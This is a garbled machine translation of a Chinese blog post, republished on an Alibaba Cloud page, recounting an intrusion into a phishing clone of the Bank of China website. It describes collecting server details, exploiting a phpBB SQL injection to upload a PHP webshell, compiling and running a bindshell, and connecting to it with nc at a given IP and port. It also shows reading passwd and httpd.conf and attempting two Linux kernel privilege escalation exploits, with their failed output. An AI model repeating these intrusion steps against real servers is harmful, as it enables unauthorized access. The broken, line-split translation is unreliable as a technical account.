I was not planning to make this unsuccessful
Intrusion
I wrote it out, but a few of my friends wanted to see that since they can communicate internally, there is nothing to be seen. Just come out, and beginners can learn from it, I want to learn more.
On the evening of the 27 th, I saw a report from tianyao:
The Bank of China website once again encountered a clone of a fake website in North America
, This site reprint path:
_
Blank>
Http://www.coolersky.com/web/news/20050228014041.asp
I had to sort out the plan. Now that this is the case, let's take a look. Don't talk nonsense, start!
1. Collect information
Service
Device information:
Apache/1.3.33
PHP/4.3.9
Main website file:
_
Blank>
Http://www.banochi.net/english/index.shtml
Looking at fake websites, there is basically no available content. It is estimated that there are only records.
Password
And ip cgi program. Besides
Service
Tool
Intrusion
, You can also consider.
I searched other sites and analyzed the injection of several PHP sites, which were not used too much. Think of the phpBB cave, write Section
Code
Search the Viewtopic. php file and find a phpbb2.0.10 file.
Intrusion
Point
_
Blank>
Http://www.bits-clsu.org/forum/viewtopic.php? T = 1
After the event, I remembered that I could use a side note.
Tools
Search directly. They are all the same.
2. Upload Trojan
Using phpBB holes,
Vulnerabilities
Introduction
"PhpBB Remote Arbitrary SQL Injection Vulnerability
","
Phpbbsql
Injection
Vulnerabilities
Analysis "Upload PHP webshells.
3. Generate bindshell When I was still reading the file, Edward made a bindshell! Basic method:
Upload bindshell. c
Gcc-O/tmp/Bind bindshell. c
/Tmp/Bind
NC to see, it is more convenient in shell.
NC-VV 216.22.48.72 7758
4. Collect System Information After obtaining webshell, you can obtain some basic information, including passwd and httpd. conf, and retrieve the absolute path of a false website/home/banochin/public.
_
Html/, in webshell view the file creation period is
Service
The following files are available in its cgi-bin directory:
Last modified size attribute on file creation date
[Member] 21:39:03 21:39:03 0700
Errlog. dat 00:32:22 00:32:22 140.186 kb 0600
Id. dat 10:48:35 10:48:35 1.727 kb 0600
Index.htm 03:19:51 03:19:51 0.697 kb 0644
PWD. dat 00:36:15 00:36:15 0.170 kb 0600
Pwdbak. dat 03:24:17 03:19:55 0.516 kb 0600
Security. cgi 03:24:03 03:20:00 44.363 kb 0700
Visemailer. cgi 03:24:04 03:20:02 3.554 kb 0700
You can see
Password
The date is July 22, February 25. After browsing the directory, I found that the contents of the Bank of China website in many other languages are also included, but they are basically HTML files, which must have been dumped directly from the Bank of China webdump.
Kernel information, because we do not have the write permission on its directory, the next thing we need to do is to escalate the permission. It took about one hour before and after, while it took me more than a day to raise the right. The result was still not completed, so I was depressed!
Uname-R
2.4.20-021stab022. 11.777-Enterprise
5. Local permission escalation Test
Add environment variable
Export Path =/usr/bin: $ path
Otherwise, the error "collect2: cannot find 'ld" will appear!
(1) Linux kernel moxa serial drive BSS Overflow
Vulnerabilities
Grsecurity 2.1.0 release/5 Linux kernel advisories
URL:
_
Blank>
Http://marc.theaimsgroup.com /? L = full-disclosure & M = 110374209001676 & W = 2
Test:
Gcc-O VC
_
Resize. c
./VC
_
Resize
------------------------------------------------------------------------
Open: no such device or address
------------------------------------------------------------------------
GCC memory
_
Leak. C-o memory
_
Leak
------------------------------------------------------------------------
Memory
_
Leak. C: 80: 2: Warning: No newline at end of File
------------------------------------------------------------------------
(4) Linux kernel do
_
Mremap VMA local permission escalation
Vulnerabilities
Linux Kernel do
_
Mremap VMA Limit Local Privilege Escalation
URL:
_
Blank>
Http://marc.theaimsgroup.com /? L = BugTraq & M = 110554694522719 & W = 2
Test:
Gcc-o smp. c
./SMP
------------------------------------------------------------------------
[+] In thread 1 (pid = 5400)
[+] In thread 2 (pid = 5401)
[+] Rdtsc calibrdation: 53428
[+] Exploiting race, wait...
[-] Unable to exploit race in 30 s,
Kernel patched or load too high.
------------------------------------------------------------------------
Failed to try multiple Local Elevation of Privilege! Very depressing! During the test, the fake website has been closed. Although the file is still in progress, it is clear that the official team has made great efforts and achieved good results.
6. Others I found a few
Linux
The root permission is required. While
Service
It is estimated that sniffer is useless for remote connection to SSH, so there is no idea at the moment to clean up exp and log files.
The above are some of my test results, and the results are not obtained as root, but I sorted out the relevant
Vulnerabilities
In the future. I published the relevant results in the webmaster group, and no one answered. I don't know if everyone is too busy...
There is no special handling in this article
Vulnerabilities
And the results, can be used directly if you are interested, but there is no need to embarrass other sites, I want you to understand what I mean!
After so long, there are still a lot of work to do! Hope it won't be said by the boss, huh, huh!
Finally, I would like to thank Edward, la, and some of our colleagues!
The article can be reproduced at will, but please indicate the source, especially the whole and part of the content in this article shall not be used in any business or
Billing
Action. Thank you!
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
